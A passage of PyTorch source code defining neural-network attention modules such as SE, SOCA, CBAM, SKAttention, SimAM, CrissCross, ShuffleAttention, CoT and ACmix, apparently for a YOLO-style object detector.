===\n\n# === SEAttention start === \n\n# https://arxiv.org/abs/1709.01507\nclass SEAttention(nn.Module):\n\n def __init__(self, channel=512,reduction=16):\n super().__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.fc = nn.Sequential(\n nn.Linear(channel, channel // reduction, bias=False),\n nn.ReLU(inplace=True),\n nn.Linear(channel // reduction, channel, bias=False),\n nn.Sigmoid()\n )\n\n\n def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n init.kaiming_normal_(m.weight, mode='fan_out')\n if m.bias is not 
None:\n init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm2d):\n init.constant_(m.weight, 1)\n init.constant_(m.bias, 0)\n elif isinstance(m, nn.Linear):\n init.normal_(m.weight, std=0.001)\n if m.bias is not None:\n init.constant_(m.bias, 0)\n\n def forward(self, x):\n b, c, _, _ = x.size()\n y = self.avg_pool(x).view(b, c)\n y = self.fc(y).view(b, c, 1, 1)\n return x * y.expand_as(x)\n\n# === SEAttention end ===\n\n\n# === SOCA start ===\n\nclass Covpool(Function):\n @staticmethod\n def forward(ctx, input):\n x = input\n batchSize = x.data.shape[0]\n dim = x.data.shape[1]\n h = x.data.shape[2]\n w = x.data.shape[3]\n M = h*w\n x = x.reshape(batchSize,dim,M)\n I_hat = (-1./M/M)*torch.ones(M,M,device = x.device) + (1./M)*torch.eye(M,M,device = x.device)\n I_hat = I_hat.view(1,M,M).repeat(batchSize,1,1).type(x.dtype)\n y = x.bmm(I_hat).bmm(x.transpose(1,2))\n ctx.save_for_backward(input,I_hat)\n return y\n @staticmethod\n def backward(ctx, grad_output):\n input,I_hat = ctx.saved_tensors\n x = input\n batchSize = x.data.shape[0]\n dim = x.data.shape[1]\n h = x.data.shape[2]\n w = x.data.shape[3]\n M = h*w\n x = x.reshape(batchSize,dim,M)\n grad_input = grad_output + grad_output.transpose(1,2)\n grad_input = grad_input.bmm(x).bmm(I_hat)\n grad_input = grad_input.reshape(batchSize,dim,h,w)\n return grad_input\n\nclass Sqrtm(Function):\n @staticmethod\n def forward(ctx, input, iterN):\n x = input\n batchSize = x.data.shape[0]\n dim = x.data.shape[1]\n dtype = x.dtype\n I3 = 3.0*torch.eye(dim,dim,device = x.device).view(1, dim, dim).repeat(batchSize,1,1).type(dtype)\n normA = (1.0/3.0)*x.mul(I3).sum(dim=1).sum(dim=1)\n A = x.div(normA.view(batchSize,1,1).expand_as(x))\n Y = torch.zeros(batchSize, iterN, dim, dim, requires_grad = False, device = x.device)\n Z = torch.eye(dim,dim,device = x.device).view(1,dim,dim).repeat(batchSize,iterN,1,1)\n if iterN < 2:\n ZY = 0.5*(I3 - A)\n Y[:,0,:,:] = A.bmm(ZY)\n else:\n ZY = 0.5*(I3 - A)\n Y[:,0,:,:] = A.bmm(ZY)\n Z[:,0,:,:] = ZY\n for i in range(1, iterN-1):\n ZY = 0.5*(I3 - Z[:,i-1,:,:].bmm(Y[:,i-1,:,:]))\n Y[:,i,:,:] = Y[:,i-1,:,:].bmm(ZY)\n Z[:,i,:,:] = ZY.bmm(Z[:,i-1,:,:])\n ZY = 0.5*Y[:,iterN-2,:,:].bmm(I3 - Z[:,iterN-2,:,:].bmm(Y[:,iterN-2,:,:]))\n y = ZY*torch.sqrt(normA).view(batchSize, 1, 1).expand_as(x)\n ctx.save_for_backward(input, A, ZY, normA, Y, Z)\n ctx.iterN = iterN\n return y\n @staticmethod\n def backward(ctx, grad_output):\n input, A, ZY, normA, Y, Z = ctx.saved_tensors\n iterN = ctx.iterN\n x = input\n batchSize = x.data.shape[0]\n dim = x.data.shape[1]\n dtype = x.dtype\n der_postCom = grad_output*torch.sqrt(normA).view(batchSize, 1, 1).expand_as(x)\n der_postComAux = (grad_output*ZY).sum(dim=1).sum(dim=1).div(2*torch.sqrt(normA))\n I3 = 3.0*torch.eye(dim,dim,device = x.device).view(1, dim, dim).repeat(batchSize,1,1).type(dtype)\n if iterN < 2:\n der_NSiter = 0.5*(der_postCom.bmm(I3 - A) - A.bmm(der_sacleTrace))\n else:\n dldY = 0.5*(der_postCom.bmm(I3 - Y[:,iterN-2,:,:].bmm(Z[:,iterN-2,:,:])) -\n Z[:,iterN-2,:,:].bmm(Y[:,iterN-2,:,:]).bmm(der_postCom))\n dldZ = -0.5*Y[:,iterN-2,:,:].bmm(der_postCom).bmm(Y[:,iterN-2,:,:])\n for i in range(iterN-3, -1, -1):\n YZ = I3 - Y[:,i,:,:].bmm(Z[:,i,:,:])\n ZY = Z[:,i,:,:].bmm(Y[:,i,:,:])\n dldY_ = 0.5*(dldY.bmm(YZ) - \n Z[:,i,:,:].bmm(dldZ).bmm(Z[:,i,:,:]) - \n ZY.bmm(dldY))\n dldZ_ = 0.5*(YZ.bmm(dldZ) - \n Y[:,i,:,:].bmm(dldY).bmm(Y[:,i,:,:]) -\n dldZ.bmm(ZY))\n dldY = dldY_\n dldZ = dldZ_\n der_NSiter = 0.5*(dldY.bmm(I3 - A) - dldZ - A.bmm(dldY))\n grad_input = 
der_NSiter.div(normA.view(batchSize,1,1).expand_as(x))\n grad_aux = der_NSiter.mul(x).sum(dim=1).sum(dim=1)\n for i in range(batchSize):\n grad_input[i,:,:] += (der_postComAux[i] \\\n - grad_aux[i] / (normA[i] * normA[i])) \\\n *torch.ones(dim,device = x.device).diag()\n return grad_input, None\n\ndef CovpoolLayer(var):\n return Covpool.apply(var)\n\ndef SqrtmLayer(var, iterN):\n return Sqrtm.apply(var, iterN)\n\nclass SOCA(nn.Module):\n # second-order Channel attention\n def __init__(self, channel, reduction=8):\n super(SOCA, self).__init__()\n self.max_pool = nn.MaxPool2d(kernel_size=2)\n\n self.conv_du = nn.Sequential(\n nn.Conv2d(channel, channel // reduction, 1, padding=0, bias=True),\n nn.ReLU(inplace=True),\n nn.Conv2d(channel // reduction, channel, 1, padding=0, bias=True),\n nn.Sigmoid()\n )\n\n def forward(self, x):\n batch_size, C, h, w = x.shape # x: NxCxHxW\n N = int(h * w)\n min_h = min(h, w)\n h1 = 1000\n w1 = 1000\n if h < h1 and w < w1:\n x_sub = x\n elif h < h1 and w > w1:\n W = (w - w1) // 2\n x_sub = x[:, :, :, W:(W + w1)]\n elif w < w1 and h > h1:\n H = (h - h1) // 2\n x_sub = x[:, :, H:H + h1, :]\n else:\n H = (h - h1) // 2\n W = (w - w1) // 2\n x_sub = x[:, :, H:(H + h1), W:(W + w1)]\n cov_mat = CovpoolLayer(x_sub) # Global Covariance pooling layer\n cov_mat_sqrt = SqrtmLayer(cov_mat,5) # Matrix square root layer( including pre-norm,Newton-Schulz iter. and post-com. with 5 iteration)\n cov_mat_sum = torch.mean(cov_mat_sqrt,1)\n cov_mat_sum = cov_mat_sum.view(batch_size,C,1,1)\n y_cov = self.conv_du(cov_mat_sum)\n return y_cov*x\n\n# === SOCA end ===\n\n# === NAMA Attention start===\n\nclass Channel_Att(nn.Module):\n def __init__(self, channels, t=16):\n super(Channel_Att, self).__init__()\n self.channels = channels\n \n self.bn2 = nn.BatchNorm2d(self.channels, affine=True)\n\n\n def forward(self, x):\n residual = x\n\n x = self.bn2(x)\n weight_bn = self.bn2.weight.data.abs() / torch.sum(self.bn2.weight.data.abs())\n x = x.permute(0, 2, 3, 1).contiguous()\n x = torch.mul(weight_bn, x)\n x = x.permute(0, 3, 1, 2).contiguous()\n \n x = torch.sigmoid(x) * residual #\n \n return x\n\n\nclass NAMAttention(nn.Module):\n def __init__(self, channels, out_channels=None, no_spatial=True):\n super(NAMAttention, self).__init__()\n self.Channel_Att = Channel_Att(channels)\n \n def forward(self, x):\n x_out1=self.Channel_Att(x)\n \n return x_out1 \n\n# === NAMA Attention end ===\n\n# === CBAM start ===\nclass ChannelAttentionModule(nn.Module):\n def __init__(self, c1, reduction=16):\n super(ChannelAttentionModule, self).__init__()\n mid_channel = c1 // reduction\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.max_pool = nn.AdaptiveMaxPool2d(1)\n\n self.shared_MLP = nn.Sequential(\n nn.Linear(in_features=c1, out_features=mid_channel),\n nn.LeakyReLU(0.1, inplace=True),\n nn.Linear(in_features=mid_channel, out_features=c1)\n )\n self.act = nn.Sigmoid()\n #self.act=nn.SiLU()\n def forward(self, x):\n avgout = self.shared_MLP(self.avg_pool(x).view(x.size(0),-1)).unsqueeze(2).unsqueeze(3)\n maxout = self.shared_MLP(self.max_pool(x).view(x.size(0),-1)).unsqueeze(2).unsqueeze(3)\n return self.act(avgout + maxout)\n \nclass SpatialAttentionModule(nn.Module):\n def __init__(self):\n super(SpatialAttentionModule, self).__init__()\n self.conv2d = nn.Conv2d(in_channels=2, out_channels=1, kernel_size=7, stride=1, padding=3)\n self.act = nn.Sigmoid()\n def forward(self, x):\n avgout = torch.mean(x, dim=1, keepdim=True)\n maxout, _ = torch.max(x, dim=1, keepdim=True)\n out = torch.cat([avgout, 
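            # (added note) the channel-wise mean and max are concatenated into a
            # 2-channel spatial descriptor; the 7x7 conv defined above collapses
            # it into a single spatial attention map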
maxout], dim=1)\n out = self.act(self.conv2d(out))\n return out\n\nclass CBAM(nn.Module):\n def __init__(self, c1,c2):\n super(CBAM, self).__init__()\n self.channel_attention = ChannelAttentionModule(c1)\n self.spatial_attention = SpatialAttentionModule()\n\n def forward(self, x):\n out = self.channel_attention(x) * x\n out = self.spatial_attention(out) * out\n return out\n \n\n# === CBAM end ===\n\n\n# === SKAttention start ===\n\n\n\nclass SKAttention(nn.Module):\n\n def __init__(self, channel=512,kernels=[1,3,5,7],reduction=16,group=32,L=32):\n super().__init__()\n self.d=max(L,channel//reduction)\n self.convs=nn.ModuleList([])\n for k in kernels:\n self.convs.append(\n nn.Sequential(OrderedDict([\n ('conv',nn.Conv2d(channel,channel,kernel_size=k,padding=k//2,groups=group)),\n ('bn',nn.BatchNorm2d(channel)),\n ('relu',nn.ReLU())\n ]))\n )\n self.fc=nn.Linear(channel,self.d)\n self.fcs=nn.ModuleList([])\n for i in range(len(kernels)):\n self.fcs.append(nn.Linear(self.d,channel))\n self.softmax=nn.Softmax(dim=0)\n\n\n\n def forward(self, x):\n bs, c, _, _ = x.size()\n conv_outs=[]\n ### split\n for conv in self.convs:\n conv_outs.append(conv(x))\n feats=torch.stack(conv_outs,0)#k,bs,channel,h,w\n\n ### fuse\n U=sum(conv_outs) #bs,c,h,w\n\n ### reduction channel\n S=U.mean(-1).mean(-1) #bs,c\n Z=self.fc(S) #bs,d\n\n ### calculate attention weight\n weights=[]\n for fc in self.fcs:\n weight=fc(Z)\n weights.append(weight.view(bs,c,1,1)) #bs,channel\n attention_weughts=torch.stack(weights,0)#k,bs,channel,1,1\n attention_weughts=self.softmax(attention_weughts)#k,bs,channel,1,1\n\n ### fuse\n V=(attention_weughts*feats).sum(0)\n return V\n\n\n\n# === SKAttention end ===\n\n\n# === SimAM start ===\n\nclass SimAM(torch.nn.Module):\n def __init__(self, channels = None, e_lambda = 1e-4):\n super(SimAM, self).__init__()\n\n self.activaton = nn.Sigmoid()\n self.e_lambda = e_lambda\n\n def __repr__(self):\n s = self.__class__.__name__ + '('\n s += ('lambda=%f)' % self.e_lambda)\n return s\n\n @staticmethod\n def get_module_name():\n return \"simam\"\n\n def forward(self, x):\n\n b, c, h, w = x.size()\n \n n = w * h - 1\n\n x_minus_mu_square = (x - x.mean(dim=[2,3], keepdim=True)).pow(2)\n y = x_minus_mu_square / (4 * (x_minus_mu_square.sum(dim=[2,3], keepdim=True) / n + self.e_lambda)) + 0.5\n\n return x * self.activaton(y) \n\n# === SimAM end ===\n\n# === S2 MLPv2 start ==\n\n# https://arxiv.org/abs/2108.01072\ndef spatial_shift1(x):\n b,w,h,c = x.size()\n x[:,1:,:,:c//4] = x[:,:w-1,:,:c//4]\n x[:,:w-1,:,c//4:c//2] = x[:,1:,:,c//4:c//2]\n x[:,:,1:,c//2:c*3//4] = x[:,:,:h-1,c//2:c*3//4]\n x[:,:,:h-1,3*c//4:] = x[:,:,1:,3*c//4:]\n return x\n\n\ndef spatial_shift2(x):\n b,w,h,c = x.size()\n x[:,:,1:,:c//4] = x[:,:,:h-1,:c//4]\n x[:,:,:h-1,c//4:c//2] = x[:,:,1:,c//4:c//2]\n x[:,1:,:,c//2:c*3//4] = x[:,:w-1,:,c//2:c*3//4]\n x[:,:w-1,:,3*c//4:] = x[:,1:,:,3*c//4:]\n return x\n\n\nclass SplitAttention(nn.Module):\n def __init__(self,channel=512,k=3):\n super().__init__()\n self.channel=channel\n self.k=k\n self.mlp1=nn.Linear(channel,channel,bias=False)\n self.gelu=nn.GELU()\n self.mlp2=nn.Linear(channel,channel*k,bias=False)\n self.softmax=nn.Softmax(1)\n \n def forward(self,x_all):\n b,k,h,w,c=x_all.shape\n x_all=x_all.reshape(b,k,-1,c) \n a=torch.sum(torch.sum(x_all,1),1) \n hat_a=self.mlp2(self.gelu(self.mlp1(a))) \n hat_a=hat_a.reshape(b,self.k,c) \n bar_a=self.softmax(hat_a) \n attention=bar_a.unsqueeze(-2) \n out=attention*x_all \n out=torch.sum(out,1).reshape(b,h,w,c)\n return out\n\n\nclass 
S2Attention(nn.Module):\n\n def __init__(self, channels=512 ):\n super().__init__()\n # print('S2Attention init 开始')\n self.mlp1 = nn.Linear(channels,channels*3)\n self.mlp2 = nn.Linear(channels,channels)\n self.split_attention = SplitAttention()\n # print('S2Attention init 结束')\n\n def forward(self, x):\n \n b,c,w,h = x.size()\n # print(x.size())\n x=x.permute(0,2,3,1)\n # print('S2Attention forward 开始 x={}',x.size())\n # print(self.mlp1)\n x = self.mlp1(x)\n # print('S2Attention forward 结束')\n x1 = spatial_shift1(x[:,:,:,:c])\n x2 = spatial_shift2(x[:,:,:,c:c*2])\n x3 = x[:,:,:,c*2:]\n x_all=torch.stack([x1,x2,x3],1)\n a = self.split_attention(x_all)\n x = self.mlp2(a)\n x=x.permute(0,3,1,2)\n \n return x\n\n# === S2 MLPv2 end ===\n\n# === CrissCrossAttention start === \n\n\ndef INF(B,H,W):\n return -torch.diag(torch.tensor(float(\"inf\")).repeat(H),0).unsqueeze(0).repeat(B*W,1,1)\n\n\nclass CrissCrossAttention(nn.Module):\n \"\"\" Criss-Cross Attention Module\"\"\"\n def __init__(self, in_dim):\n super(CrissCrossAttention,self).__init__()\n self.query_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim//8, kernel_size=1)\n self.key_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim//8, kernel_size=1)\n self.value_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim, kernel_size=1)\n self.softmax = Softmax(dim=3)\n self.INF = INF\n self.gamma = nn.Parameter(torch.zeros(1))\n\n\n def forward(self, x):\n device=x.device\n m_batchsize, _, height, width = x.size()\n proj_query = self.query_conv(x)\n proj_query_H = proj_query.permute(0,3,1,2).contiguous().view(m_batchsize*width,-1,height).permute(0, 2, 1).to(device)\n proj_query_W = proj_query.permute(0,2,1,3).contiguous().view(m_batchsize*height,-1,width).permute(0, 2, 1).to(device)\n proj_key = self.key_conv(x)\n proj_key_H = proj_key.permute(0,3,1,2).contiguous().view(m_batchsize*width,-1,height).to(device)\n proj_key_W = proj_key.permute(0,2,1,3).contiguous().view(m_batchsize*height,-1,width).to(device)\n proj_value = self.value_conv(x)\n proj_value_H = proj_value.permute(0,3,1,2).contiguous().view(m_batchsize*width,-1,height).to(device)\n proj_value_W = proj_value.permute(0,2,1,3).contiguous().view(m_batchsize*height,-1,width).to(device)\n energy_H = (torch.bmm(proj_query_H, proj_key_H).to('cpu')+self.INF(m_batchsize, height, width)).view(m_batchsize,width,height,height).permute(0,2,1,3).to(device)\n energy_W = torch.bmm(proj_query_W, proj_key_W).view(m_batchsize,height,width,width).to(device)\n concate = self.softmax(torch.cat([energy_H, energy_W], 3))\n\n att_H = concate[:,:,:,0:height].permute(0,2,1,3).contiguous().view(m_batchsize*width,height,height)\n att_W = concate[:,:,:,height:height+width].contiguous().view(m_batchsize*height,width,width)\n out_H = torch.bmm(proj_value_H, att_H.permute(0, 2, 1)).view(m_batchsize,width,-1,height).permute(0,2,3,1).to(device)\n out_W = torch.bmm(proj_value_W, att_W.permute(0, 2, 1)).view(m_batchsize,height,-1,width).permute(0,2,1,3).to(device)\n #print(out_H.size(),out_W.size())\n return self.gamma*(out_H + out_W) + x\n \n# === CrissCrossAttention end === \n\n\n# === shuffleAttention start ===\n\n\n# https://arxiv.org/pdf/2102.00240.pdf\nclass ShuffleAttention(nn.Module):\n\n def __init__(self, channel=512,reduction=16,G=8):\n super().__init__()\n self.G=G\n self.channel=channel\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.gn = nn.GroupNorm(channel // (2 * G), channel // (2 * G))\n self.cweight = Parameter(torch.zeros(1,channel // (2 * G) , 1, 1))\n self.cbias = 
Parameter(torch.ones(1, channel // (2 * G), 1, 1))\n self.sweight = Parameter(torch.zeros(1, channel // (2 * G), 1, 1))\n self.sbias = Parameter(torch.ones(1, channel // (2 * G), 1, 1))\n self.sigmoid=nn.Sigmoid()\n\n\n def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n init.kaiming_normal_(m.weight, mode='fan_out')\n if m.bias is not None:\n init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm2d):\n init.constant_(m.weight, 1)\n init.constant_(m.bias, 0)\n elif isinstance(m, nn.Linear):\n init.normal_(m.weight, std=0.001)\n if m.bias is not None:\n init.constant_(m.bias, 0)\n\n\n @staticmethod\n def channel_shuffle(x, groups):\n b, c, h, w = x.shape\n x = x.reshape(b, groups, -1, h, w)\n x = x.permute(0, 2, 1, 3, 4)\n\n # flatten\n x = x.reshape(b, -1, h, w)\n\n return x\n\n def forward(self, x):\n b, c, h, w = x.size()\n #group into subfeatures\n x=x.view(b*self.G,-1,h,w) #bs*G,c//G,h,w\n\n #channel_split\n x_0,x_1=x.chunk(2,dim=1) #bs*G,c//(2*G),h,w\n\n #channel attention\n # print(x_0.size(),x_1.size())\n x_channel=self.avg_pool(x_0) #bs*G,c//(2*G),1,1\n # print(self.cweight.size(),x_channel.size(),self.cbias.size())\n x_channel=self.cweight*x_channel+self.cbias #bs*G,c//(2*G),1,1\n x_channel=x_0*self.sigmoid(x_channel)\n\n #spatial attention\n x_spatial=self.gn(x_1) #bs*G,c//(2*G),h,w\n x_spatial=self.sweight*x_spatial+self.sbias #bs*G,c//(2*G),h,w\n x_spatial=x_1*self.sigmoid(x_spatial) #bs*G,c//(2*G),h,w\n\n # concatenate along channel axis\n out=torch.cat([x_channel,x_spatial],dim=1) #bs*G,c//G,h,w\n out=out.contiguous().view(b,-1,h,w)\n\n # channel shuffle\n out = self.channel_shuffle(out, 2)\n return out\n\n# === shuffleAttention end ===\n\n\n# build DWConvblock\n# -------------------------------------------------------------------------\nclass DWConvblock(nn.Module):\n \"Depthwise conv + Pointwise conv\"\n\n def __init__(self, in_channels, out_channels, k, s):\n super(DWConvblock, self).__init__()\n self.p = k // 2\n self.conv1 = nn.Conv2d(in_channels, in_channels, kernel_size=k, stride=s, padding=self.p, groups=in_channels,\n bias=False)\n self.bn1 = nn.BatchNorm2d(in_channels)\n self.conv2 = nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=1, padding=0, bias=False)\n self.bn2 = nn.BatchNorm2d(out_channels)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.bn1(x)\n x = F.relu(x)\n x = self.conv2(x)\n x = self.bn2(x)\n x = F.relu(x)\n return x\n\n# DWConvblock end\n# -------------------------------------------------------------------------\n\n\n# === picodet start ===\n\ndef channel_shuffle(x, groups=2): ##shuffle channel \n #RESHAPE----->transpose------->Flatten \n B, C, H, W = x.size()\n out = x.view(B, groups, C // groups, H, W).permute(0, 2, 1, 3, 4).contiguous()\n out=out.view(B, C, H, W) \n return out\n\n# PicoDet\nclass ES_SEModule(nn.Module):\n def __init__(self, channel, reduction=4):\n super().__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.conv1 = nn.Conv2d(\n in_channels=channel,\n out_channels=channel // reduction,\n kernel_size=1,\n stride=1,\n padding=0)\n self.relu = nn.ReLU()\n self.conv2 = nn.Conv2d(\n in_channels=channel // reduction,\n out_channels=channel,\n kernel_size=1,\n stride=1,\n padding=0)\n self.hardsigmoid = nn.Hardsigmoid()\n\n def forward(self, x):\n identity = x\n x = self.avg_pool(x)\n x = self.conv1(x)\n x = self.relu(x)\n x = self.conv2(x)\n x = self.hardsigmoid(x)\n out = identity * x\n return out\n \nclass ES_Bottleneck(nn.Module):\n def __init__(self, inp, oup, stride):\n 
super(ES_Bottleneck, self).__init__()\n\n if not (1 <= stride <= 3):\n raise ValueError('illegal stride value')\n self.stride = stride\n\n branch_features = oup // 2\n # assert (self.stride != 1) or (inp == branch_features << 1)\n\n if self.stride > 1:\n self.branch1 = nn.Sequential(\n self.depthwise_conv(inp, inp, kernel_size=3, stride=self.stride, padding=1),\n nn.BatchNorm2d(inp),\n nn.Conv2d(inp, branch_features, kernel_size=1, stride=1, padding=0, bias=False),\n nn.BatchNorm2d(branch_features),\n nn.Hardswish(inplace=True),\n )\n\n self.branch2 = nn.Sequential(\n nn.Conv2d(inp if (self.stride > 1) else branch_features,\n branch_features, kernel_size=1, stride=1, padding=0, bias=False),\n nn.BatchNorm2d(branch_features),\n nn.Hardswish(inplace=True),\n self.depthwise_conv(branch_features, branch_features, kernel_size=3, stride=self.stride, padding=1),\n nn.BatchNorm2d(branch_features),\n ES_SEModule(branch_features),\n nn.Conv2d(branch_features, branch_features, kernel_size=1, stride=1, padding=0, bias=False),\n nn.BatchNorm2d(branch_features),\n nn.Hardswish(inplace=True),\n )\n\n self.branch3 = nn.Sequential(\n GhostConv(branch_features, branch_features, 3, 1),\n ES_SEModule(branch_features),\n nn.Conv2d(branch_features, branch_features, kernel_size=1, stride=1, padding=0, bias=False),\n nn.BatchNorm2d(branch_features),\n nn.Hardswish(inplace=True),\n )\n\n self.branch4 = nn.Sequential(\n self.depthwise_conv(oup, oup, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(oup),\n nn.Conv2d(oup, oup, kernel_size=1, stride=1, padding=0, bias=False),\n nn.BatchNorm2d(oup),\n nn.Hardswish(inplace=True),\n )\n\n\n @staticmethod\n def depthwise_conv(i, o, kernel_size=3, stride=1, padding=0, bias=False):\n return nn.Conv2d(i, o, kernel_size, stride, padding, bias=bias, groups=i)\n\n @staticmethod\n def conv1x1(i, o, kernel_size=1, stride=1, padding=0, bias=False):\n return nn.Conv2d(i, o, kernel_size, stride, padding, bias=bias)\n\n def forward(self, x):\n if self.stride == 1:\n x1, x2 = x.chunk(2, dim=1)\n x3 = torch.cat((x1, self.branch3(x2)), dim=1)\n out = channel_shuffle(x3, 2)\n elif self.stride == 2:\n x1 = torch.cat((self.branch1(x), self.branch2(x)), dim=1)\n out = self.branch4(x1)\n\n return out\n\nclass CBH(nn.Module):\n def __init__(self, num_channels, num_filters, filter_size, stride, num_groups=1):\n super().__init__()\n self.conv = nn.Conv2d(\n num_channels,\n num_filters,\n filter_size,\n stride,\n padding=(filter_size - 1) // 2,\n groups=num_groups,\n bias=False)\n self.bn = nn.BatchNorm2d(num_filters)\n self.hardswish = nn.Hardswish()\n\n def forward(self, x):\n x = self.conv(x)\n x = self.bn(x)\n x = self.hardswish(x)\n return x\n\n def fuseforward(self, x):\n return self.hardswish(self.conv(x))\n\n\n# === picodet end ===\n\n# === CoT3 start ===\n\nclass CoT3(nn.Module):\n def __init__(self, c1, c2, n=1, shortcut=True, g=1, e=0.5): # ch_in, ch_out, number, shortcut, groups, expansion\n super().__init__()\n c_ = int(c2 * e) # hidden channels\n self.cv1 = Conv(c1, c_, 1, 1)\n self.cv2 = Conv(c1, c_, 1, 1)\n self.cv3 = Conv(2 * c_, c2, 1) # act=FReLU(c2)\n self.m = nn.Sequential(*[CoTBottleneck(c_, c_, shortcut, g, e=1.0) for _ in range(n)])\n # self.m = nn.Sequential(*[CrossConv(c_, c_, 3, 1, g, 1.0, shortcut) for _ in range(n)])\n\n def forward(self, x):\n return self.cv3(torch.cat((self.m(self.cv1(x)), self.cv2(x)), dim=1))\n\nclass CoTBottleneck(nn.Module):\n def __init__(self, c1, c2, shortcut=True, g=1, e=0.5): # ch_in, ch_out, shortcut, groups, expansion\n 
super(CoTBottleneck, self).__init__()\n c_ = int(c2 * e) # hidden channels\n self.cv1 = Conv(c1, c_, 1, 1)\n self.cv2 = CoT(c_, 3)\n self.add = shortcut and c1 == c2\n\n def forward(self, x):\n return x + self.cv2(self.cv1(x)) if self.add else self.cv2(self.cv1(x))\n\nclass CoT(nn.Module):\n # Contextual Transformer Networks https://arxiv.org/abs/2107.12292\n def __init__(self, dim=512,kernel_size=3):\n super().__init__()\n self.dim=dim\n self.kernel_size=kernel_size\n\n self.key_embed=nn.Sequential(\n nn.Conv2d(dim,dim,kernel_size=kernel_size,padding=kernel_size//2,groups=4,bias=False),\n nn.BatchNorm2d(dim),\n nn.ReLU()\n )\n self.value_embed=nn.Sequential(\n nn.Conv2d(dim,dim,1,bias=False),\n nn.BatchNorm2d(dim)\n )\n\n factor=4\n self.attention_embed=nn.Sequential(\n nn.Conv2d(2*dim,2*dim//factor,1,bias=False),\n nn.BatchNorm2d(2*dim//factor),\n nn.ReLU(),\n nn.Conv2d(2*dim//factor,kernel_size*kernel_size*dim,1)\n )\n\n\n def forward(self, x):\n bs,c,h,w=x.shape\n k1=self.key_embed(x) #bs,c,h,w\n v=self.value_embed(x).view(bs,c,-1) #bs,c,h,w\n\n y=torch.cat([k1,x],dim=1) #bs,2c,h,w\n att=self.attention_embed(y) #bs,c*k*k,h,w\n att=att.reshape(bs,c,self.kernel_size*self.kernel_size,h,w)\n att=att.mean(2,keepdim=False).view(bs,c,-1) #bs,c,h*w\n k2=F.softmax(att,dim=-1)*v\n k2=k2.view(bs,c,h,w)\n \n return k1+k2\n\n# === CoT3 end ===\n\n\n# === C3HB start===\nclass C3HB(nn.Module):\n # CSP HorBlock with 3 convolutions by iscyy/yoloair\n def __init__(self, c1, c2, n=1, shortcut=True, g=1, e=0.5): # ch_in, ch_out, number, shortcut, groups, expansion\n super().__init__()\n c_ = int(c2 * e) # hidden channels\n self.cv1 = Conv(c1, c_, 1, 1)\n self.cv2 = Conv(c1, c_, 1, 1)\n self.cv3 = Conv(2 * c_, c2, 1)\n self.m = nn.Sequential(*(HorBlock(c_) for _ in range(n)))\n def forward(self, x):\n return self.cv3(torch.cat((self.m(self.cv1(x)), self.cv2(x)), dim=1))\n\n# === C3HB end ===\n\n\n# ==== acmix start ===\n\ndef position(H, W, is_cuda=True):\n if is_cuda:\n loc_w = torch.linspace(-1.0, 1.0, W).cuda().unsqueeze(0).repeat(H, 1)\n loc_h = torch.linspace(-1.0, 1.0, H).cuda().unsqueeze(1).repeat(1, W)\n else:\n loc_w = torch.linspace(-1.0, 1.0, W).unsqueeze(0).repeat(H, 1)\n loc_h = torch.linspace(-1.0, 1.0, H).unsqueeze(1).repeat(1, W)\n loc = torch.cat([loc_w.unsqueeze(0), loc_h.unsqueeze(0)], 0).unsqueeze(0)\n return loc\n\n\ndef stride(x, stride):\n b, c, h, w = x.shape\n return x[:, :, ::stride, ::stride]\n\ndef init_rate_half(tensor):\n if tensor is not None:\n tensor.data.fill_(0.5)\n\ndef init_rate_0(tensor):\n if tensor is not None:\n tensor.data.fill_(0.)\n\n\nclass ACmix(nn.Module):\n def __init__(self, in_planes, out_planes, kernel_att=7, head=4, kernel_conv=3, stride=1, dilation=1):\n super(ACmix, self).__init__()\n self.in_planes = in_planes\n self.out_planes = out_planes\n self.head = head\n self.kernel_att = kernel_att\n self.kernel_conv = kernel_conv\n self.stride = stride\n self.dilation = dilation\n self.rate1 = torch.nn.Parameter(torch.Tensor(1))\n self.rate2 = torch.nn.Parameter(torch.Tensor(1))\n self.head_dim = self.out_planes // self.head\n\n self.conv1 = nn.Conv2d(in_planes, out_planes, kernel_size=1)\n self.conv2 = nn.Conv2d(in_planes, out_planes, kernel_size=1)\n self.conv3 = nn.Conv2d(in_planes, out_planes, kernel_size=1)\n self.conv_p = nn.Conv2d(2, self.head_dim, kernel_size=1)\n\n self.padding_att = (self.dilation * (self.kernel_att - 1) + 1) // 2\n self.pad_att = torch.nn.ReflectionPad2d(self.padding_att)\n self.unfold = nn.Unfold(kernel_size=self.kernel_att, 
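                                # (added note) nn.Unfold extracts kernel_att x kernel_att
                                # patches at each output position, so the attention branch
                                # below can score every local window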
padding=0, stride=self.stride)\n self.softmax = torch.nn.Softmax(dim=1)\n\n self.fc = nn.Conv2d(3*self.head, self.kernel_conv * self.kernel_conv, kernel_size=1, bias=False)\n self.dep_conv = nn.Conv2d(self.kernel_conv * self.kernel_conv * self.head_dim, out_planes, kernel_size=self.kernel_conv, bias=True, groups=self.head_dim, padding=1, stride=stride)\n\n self.reset_parameters()\n \n def reset_parameters(self):\n init_rate_half(self.rate1)\n init_rate_half(self.rate2)\n kernel = torch.zeros(self.kernel_conv * self.kernel_conv, self.kernel_conv, self.kernel_conv)\n for i in range(self.kernel_conv * self.kernel_conv):\n kernel[i, i//self.kernel_conv, i%self.kernel_conv] = 1.\n kernel = kernel.squeeze(0).repeat(self.out_planes, 1, 1, 1)\n self.dep_conv.weight = nn.Parameter(data=kernel, requires_grad=True)\n self.dep_conv.bias = init_rate_0(self.dep_conv.bias)\n\n def forward(self, x):\n q, k, v = self.conv1(x), self.conv2(x), self.conv3(x)\n scaling = float(self.head_dim) ** -0.5\n b, c, h, w = q.shape\n h_out, w_out = h//self.stride, w//self.stride\n\n\n # ### att\n # ## positional encoding\n pe = self.conv_p(position(h, w, x.is_cuda))\n\n q_att = q.view(b*self.head, 